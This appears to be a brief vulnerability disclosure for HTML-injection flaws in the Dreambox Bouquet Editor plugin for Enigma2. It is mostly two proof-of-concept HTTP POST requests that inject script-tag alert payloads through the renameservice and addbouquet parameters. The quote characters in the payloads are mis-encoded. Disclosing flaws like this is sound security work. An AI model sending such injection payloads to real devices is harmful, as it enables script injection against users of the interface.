Dreambox Bouquet Editor Plugin for Enigma2 Multiple HTML-injection Vulnerabilities

Dreambox Bouquet Editor Plugin for Enigma2 Multiple HTML-injection Vulnerabilities

An attacker can exploit these issues using a web browser.

The following example data is available:

POST /bouqueteditor/web/renameservice?sRef=1:7:1:0:0:0:0:0:0:0:FROM%20BOUQUET%20%22userbouquet.___script_alert__df____script___tv_.tv%22%20ORDER%20BY%20bouquet&mode=0&newName=%22%3E%3Cscript%3Ealert(â??findmeâ??)%3C%2Fscript%3E HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 10.0.1.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://10.0.1.1/bouqueteditor/
Cookie: %7B%22updateCurrentInterval%22%3A120000%7D; %7B%22updateCurrentInterval%22%3A120000%2C%22updateBouquetInterval%22%3A300000%7D
Proxy-Connection: Keep-Alive
Content-Length: 0
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache,no-store
Expires: -1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

POST /bouqueteditor/web/addbouquet?name=%22%3E%3Cscript%3Ealert(â??DFâ??)%3C/script%3E&mode=0 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 10.0.1.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://10.0.1.1/bouqueteditor/
Cookie: %7B%22updateCurrentInterval%22%3A120000%7D; %7B%22updateCurrentInterval%22%3A120000%2C%22updateBouquetInterval%22%3A300000%7D
Proxy-Connection: Keep-Alive
Content-Length: 0
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache,no-store
Expires: -1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8